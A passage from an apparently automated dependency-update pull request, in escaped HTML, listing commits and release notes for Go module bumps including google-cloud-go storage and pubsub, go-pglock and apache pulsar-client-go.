href=\"https://github.com/googleapis/google-cloud-go/commit/7cd251203fc35859882ecda532b7debaff378374\"\u003e\u003ccode\u003e7cd2512\u003c/code\u003e\u003c/a\u003e chore(main): release spanner 1.77.0 (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11634\"\u003e#11634\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/28f00304ebb13abfd0da2f45b9b79de093cca1ec\"\u003e\u003ccode\u003e28f0030\u003c/code\u003e\u003c/a\u003e chore(all): fix out-of-sync version.go files (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11684\"\u003e#11684\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/655de36dce9cfd32ef88cb58037dbf655b93da21\"\u003e\u003ccode\u003e655de36\u003c/code\u003e\u003c/a\u003e feat(spanner): Support REPEATABLE_READ for RW transaction (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11654\"\u003e#11654\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/60dc167a3e9c2876fe55a4f50bd7e0682f953d67\"\u003e\u003ccode\u003e60dc167\u003c/code\u003e\u003c/a\u003e fix(aiplatform): remove VertexAISearch.engine option (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11681\"\u003e#11681\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/3f23a9176f29a0a69b9d57b16f44b72eb3096d0c\"\u003e\u003ccode\u003e3f23a91\u003c/code\u003e\u003c/a\u003e fix(aiplatform): An existing google.api.http annotation \u003ccode\u003ehttp_uri\u003c/code\u003e is changed...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/e87cedc467cbb5205ebe67855e2a95a5edb98bba\"\u003e\u003ccode\u003ee87cedc\u003c/code\u003e\u003c/a\u003e chore: remove resourcesettings (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11678\"\u003e#11678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/d662a4537c3883d13a612e335477ca875b5cf479\"\u003e\u003ccode\u003ed662a45\u003c/code\u003e\u003c/a\u003e feat(spanner): add option for LastStatement in transaction (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11638\"\u003e#11638\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/9e508d066bdaa7e41c251fa0ba7eb9b23587c3a0\"\u003e\u003ccode\u003e9e508d0\u003c/code\u003e\u003c/a\u003e chore: release main (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/11623\"\u003e#11623\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/601e74202ca6bf28506f06f27abc1d99018f9dc5\"\u003e\u003ccode\u003e601e742\u003c/code\u003e\u003c/a\u003e feat(bigquery/reservation): Add a new field \u003ccode\u003ereplication_status\u003c/code\u003e to `.google....\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/1eb601ee788e5fbc0a9f55cde580493191782df3\"\u003e\u003ccode\u003e1eb601e\u003c/code\u003e\u003c/a\u003e chore(firestore): expose the Firestore.executePipeline API to the preview bra...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/spanner/v1.67.0...spanner/v1.77.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cloud.google.com/go/pubsub` from 1.49.0 to 1.50.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/43375a0822ef7f64f1ccc43d83c804589a364f5f\"\u003e\u003ccode\u003e43375a0\u003c/code\u003e\u003c/a\u003e chore(main): release pubsub 1.50.1 (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12800\"\u003e#12800\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/9e761f961a2c4351b3e0793ed655314ac5853903\"\u003e\u003ccode\u003e9e761f9\u003c/code\u003e\u003c/a\u003e feat(storage): post support dynamic key name (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12677\"\u003e#12677\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/8650d332d2030a8a14f2839285bb61c464e26563\"\u003e\u003ccode\u003e8650d33\u003c/code\u003e\u003c/a\u003e test(storage): update err codes for append test (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12807\"\u003e#12807\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/81182666589efb09569c58045044b2f6abcc8547\"\u003e\u003ccode\u003e8118266\u003c/code\u003e\u003c/a\u003e chore(main): release 0.122.0 (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12764\"\u003e#12764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/4f1129c655226c61333be2c7ec75151e603c84d1\"\u003e\u003ccode\u003e4f1129c\u003c/code\u003e\u003c/a\u003e chore: upgrade to Go 1.24 (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12781\"\u003e#12781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/6614c1f0881a36ece018f2f03881eb01f546b302\"\u003e\u003ccode\u003e6614c1f\u003c/code\u003e\u003c/a\u003e chore: update all librarian state.yaml files to point to AR exit gates image ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/400bba5dd555b999e7bbea0b7f69719aec8e6f25\"\u003e\u003ccode\u003e400bba5\u003c/code\u003e\u003c/a\u003e chore: release main (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12737\"\u003e#12737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/4e6e92bd5d74e4f0b17c4361af64761cec7a02b7\"\u003e\u003ccode\u003e4e6e92b\u003c/code\u003e\u003c/a\u003e chore: Fix exitgate GCB configuration (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12806\"\u003e#12806\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/10e67efccf048adea11d3ecba8d0c625455e545f\"\u003e\u003ccode\u003e10e67ef\u003c/code\u003e\u003c/a\u003e feat(netapp): add new fields for flex auto tiering (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12798\"\u003e#12798\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/5ac49f661bd4743f912cfd777aff2d35cdde652b\"\u003e\u003ccode\u003e5ac49f6\u003c/code\u003e\u003c/a\u003e chore(spanner): Disable connecting to metadata server for emulator tests (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/12\"\u003e#12\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/pubsub/v1.49.0...pubsub/v1.50.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cloud.google.com/go/storage` from 1.51.0 to 1.62.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/googleapis/google-cloud-go/releases\"\u003ecloud.google.com/go/storage's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003estorage: v1.59.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/storage/v1.59.2...storage/v1.59.3\"\u003ev1.59.3\u003c/a\u003e (2026-05-05)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle MRD hang corner case (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14509\"\u003e#14509\u003c/a\u003e) (\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/1ca3b6f0\"\u003e1ca3b6f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003econtainer: v1.52.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/container/v1.51.0...container/v1.52.0\"\u003ev1.52.0\u003c/a\u003e (2026-05-14)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate API sources and regenerate (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14581\"\u003e#14581\u003c/a\u003e) (\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/df96b2ec\"\u003edf96b2ec\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/94d24ca358d9f98ccd48d1b826cfab83557d5b19\"\u003e\u003ccode\u003e94d24ca\u003c/code\u003e\u003c/a\u003e chore: librarian release pull request: 20260507T184113Z (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14549\"\u003e#14549\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/541569e80c1154b8742f147fa9667b6794be84eb\"\u003e\u003ccode\u003e541569e\u003c/code\u003e\u003c/a\u003e docs: update README to reflect Gemini Enterprise Agent Platform\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/237533a0b5847011484577241e8201ccce7e31a0\"\u003e\u003ccode\u003e237533a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14545\"\u003e#14545\u003c/a\u003e from googleapis:release-agentplatform-0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/d70876ae5d1c9de02b34df004fc0ab1c1799c289\"\u003e\u003ccode\u003ed70876a\u003c/code\u003e\u003c/a\u003e chore: release agentplatform@v0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/32a256f9daba9dbf640fd5d0f9a8975b0e35c72d\"\u003e\u003ccode\u003e32a256f\u003c/code\u003e\u003c/a\u003e feat(agentplatform): Add structured data and memory type to Memory.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/37572e3b9f0b504bc65b93c8ac30e7cd81951c6d\"\u003e\u003ccode\u003e37572e3\u003c/code\u003e\u003c/a\u003e chore: update librarian to use new config command (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14540\"\u003e#14540\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/d6d7382a552197980f8f7e19188a98b5816307bc\"\u003e\u003ccode\u003ed6d7382\u003c/code\u003e\u003c/a\u003e chore(agentplatform): update deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/fd34e97401e8089d5af765b7664778a3038906d9\"\u003e\u003ccode\u003efd34e97\u003c/code\u003e\u003c/a\u003e feat(geminidataanlytics): generate v1 client (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14542\"\u003e#14542\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/07fe29ba4c5069d27d4149d8fa5f8814eb8789d7\"\u003e\u003ccode\u003e07fe29b\u003c/code\u003e\u003c/a\u003e feat: update API sources and regenerate (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14537\"\u003e#14537\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/googleapis/google-cloud-go/commit/6b9f6c7b0930a94abd717d5097fd0b8868171aa2\"\u003e\u003ccode\u003e6b9f6c7\u003c/code\u003e\u003c/a\u003e feat(memorystore): enable gRPC transport (\u003ca href=\"https://redirect.github.com/googleapis/google-cloud-go/issues/14532\"\u003e#14532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/googleapis/google-cloud-go/compare/compute/v1.51.0...compute/v1.62.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/allisson/go-pglock/v3` from 3.0.0 to 3.2.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/allisson/go-pglock/releases\"\u003egithub.com/allisson/go-pglock/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.2.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat: add rwlock functionality by \u003ca href=\"https://github.com/masteryyh\"\u003e\u003ccode\u003e@​masteryyh\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/allisson/go-pglock/pull/15\"\u003eallisson/go-pglock#15\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: enhance documentation with emojis by \u003ca href=\"https://github.com/allisson\"\u003e\u003ccode\u003e@​allisson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/allisson/go-pglock/pull/16\"\u003eallisson/go-pglock#16\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/masteryyh\"\u003e\u003ccode\u003e@​masteryyh\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/allisson/go-pglock/pull/15\"\u003eallisson/go-pglock#15\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/allisson/go-pglock/compare/v3.1.0...v3.2.0\"\u003ehttps://github.com/allisson/go-pglock/compare/v3.1.0...v3.2.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate readme badges by \u003ca href=\"https://github.com/allisson\"\u003e\u003ccode\u003e@​allisson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/allisson/go-pglock/pull/12\"\u003eallisson/go-pglock#12\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: improve documentation, tests, and examples by \u003ca href=\"https://github.com/allisson\"\u003e\u003ccode\u003e@​allisson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/allisson/go-pglock/pull/13\"\u003eallisson/go-pglock#13\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/allisson/go-pglock/compare/v3.0.0...v3.1.0\"\u003ehttps://github.com/allisson/go-pglock/compare/v3.0.0...v3.1.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/allisson/go-pglock/commit/a8e599f5ce4b824fae73d5a1aec1d7e2b1a3671a\"\u003e\u003ccode\u003ea8e599f\u003c/code\u003e\u003c/a\u003e docs: enhance documentation with emojis (\u003ca href=\"https://redirect.github.com/allisson/go-pglock/issues/16\"\u003e#16\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/allisson/go-pglock/commit/e3b767aa28a0f8a2a7eacb0360ed3dc6b3f0ed88\"\u003e\u003ccode\u003ee3b767a\u003c/code\u003e\u003c/a\u003e feat: add rwlock functionality (\u003ca href=\"https://redirect.github.com/allisson/go-pglock/issues/15\"\u003e#15\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/allisson/go-pglock/commit/e2016c003ade7d3b44ece6ab9e867f9fcc02fa32\"\u003e\u003ccode\u003ee2016c0\u003c/code\u003e\u003c/a\u003e feat: improve documentation, tests, and examples (\u003ca href=\"https://redirect.github.com/allisson/go-pglock/issues/13\"\u003e#13\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/allisson/go-pglock/commit/acbfc79e2be6166be54a64f2a0fb8babee1d0334\"\u003e\u003ccode\u003eacbfc79\u003c/code\u003e\u003c/a\u003e Update readme badges (\u003ca href=\"https://redirect.github.com/allisson/go-pglock/issues/12\"\u003e#12\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/allisson/go-pglock/compare/v3.0.0...v3.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/apache/pulsar-client-go` from 0.14.0 to 0.19.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/pulsar-client-go/releases\"\u003egithub.com/apache/pulsar-client-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.19.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Add JSON tag for \u003ccode\u003eUpdateAuthData\u003c/code\u003e in \u003ccode\u003eUpdateOptions\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1450\"\u003e#1450\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add \u003ccode\u003eRemovePersistence\u003c/code\u003e methods to namespace admin (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1447\"\u003e#1447\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Add support for PIP-431: creation and last publish timestamps (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1451\"\u003e#1451\u003c/a\u003e) by \u003ca href=\"https://github.com/codelipenghui\"\u003e\u003ccode\u003e@​codelipenghui\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[docs] Update example code and add log initialization configurations (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1449\"\u003e#1449\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[docs] Update release process to link release and release notes to the Pulsar website (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1453\"\u003e#1453\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Change producer reconnect error logs to warn logs (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1445\"\u003e#1445\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Implement \u003ccode\u003eReconsumeLater\u003c/code\u003e on regex consumer (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1456\"\u003e#1456\u003c/a\u003e) by \u003ca href=\"https://github.com/jordanfitz\"\u003e\u003ccode\u003e@​jordanfitz\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add support for issuer URL override in client credentials flow (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1463\"\u003e#1463\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add removal methods for namespace policies (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1465\"\u003e#1465\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add support for retrieving schema compatibility strategy with options (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1469\"\u003e#1469\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add remove replication clusters topic API (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1470\"\u003e#1470\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Treat \u003ccode\u003eProducerBlockedQuotaExceededException\u003c/code\u003e as retryable and continue reconnecting (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1457\"\u003e#1457\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix panic when messages size is 0 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1460\"\u003e#1460\u003c/a\u003e) by \u003ca href=\"https://github.com/unJASON\"\u003e\u003ccode\u003e@​unJASON\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[improve] Make service URL parsing compatible with Go 1.26 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1468\"\u003e#1468\u003c/a\u003e) by \u003ca href=\"https://github.com/nodece\"\u003e\u003ccode\u003e@​nodece\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add scoped topic policies support (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1471\"\u003e#1471\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix consumer not consuming resent chunked messages (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1464\"\u003e#1464\u003c/a\u003e) by \u003ca href=\"https://github.com/geniusjoe\"\u003e\u003ccode\u003e@​geniusjoe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/codelipenghui\"\u003e\u003ccode\u003e@​codelipenghui\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1451\"\u003e#1451\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jordanfitz\"\u003e\u003ccode\u003e@​jordanfitz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1456\"\u003e#1456\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/unJASON\"\u003e\u003ccode\u003e@​unJASON\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1460\"\u003e#1460\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.18.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[improve] Modify the negativeACK structure to reduce memory overhead (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1410\"\u003e#1410\u003c/a\u003e) by \u003ca href=\"https://github.com/gy-deng\"\u003e\u003ccode\u003e@​gy-deng\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Use -1 as sentinel value for namespace and topic admin commands (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1430\"\u003e#1430\u003c/a\u003e) by \u003ca href=\"https://github.com/klevy-toast\"\u003e\u003ccode\u003e@​klevy-toast\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Update namespace \u0026amp; topic admin methods to return nil if unset (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1433\"\u003e#1433\u003c/a\u003e) by \u003ca href=\"https://github.com/klevy-toast\"\u003e\u003ccode\u003e@​klevy-toast\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[test] Add unit test for unloading topic before consuming zero queue messages (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1434\"\u003e#1434\u003c/a\u003e) by \u003ca href=\"https://github.com/crossoverJie\"\u003e\u003ccode\u003e@​crossoverJie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Add timestamp to schema info (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1436\"\u003e#1436\u003c/a\u003e) by \u003ca href=\"https://github.com/freeznet\"\u003e\u003ccode\u003e@​freeznet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix the issue of unable to parse non-batch messages that with non-empty properties and empty payloads (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1435\"\u003e#1435\u003c/a\u003e) by \u003ca href=\"https://github.com/coderzc\"\u003e\u003ccode\u003e@​coderzc\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[chore] Bump \u003ccode\u003egithub.com/dvsekhvalnov/jose2go\u003c/code\u003e from 1.6.0 to 1.7.0 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1439\"\u003e#1439\u003c/a\u003e) by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot]\u003c/li\u003e\n\u003cli\u003e[fix] Fix partition update failure causing existing producers to close (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1437\"\u003e#1437\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feat] Support reloading OAuth2 key file (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1441\"\u003e#1441\u003c/a\u003e) by \u003ca href=\"https://github.com/RobertIndie\"\u003e\u003ccode\u003e@​RobertIndie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[chore] Bump \u003ccode\u003egolang.org/x/crypto\u003c/code\u003e from 0.36.0 to 0.45.0 (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1440\"\u003e#1440\u003c/a\u003e) by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot]\u003c/li\u003e\n\u003cli\u003e[fix] Return error when the client transaction coordinator is nil to p… (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1444\"\u003e#1444\u003c/a\u003e) by \u003ca href=\"https://github.com/thomas-bousquet\"\u003e\u003ccode\u003e@​thomas-bousquet\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Enhance zero queue consumer reconnection handling and message permit management (\u003ca href=\"https://redirect.github.com/apache/pulsar-client-go/pull/1443\"\u003e#1443\u003c/a\u003e) by \u003ca href=\"https://github.com/crossoverJie\"\u003e\u003ccode\u003e@​crossoverJie\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 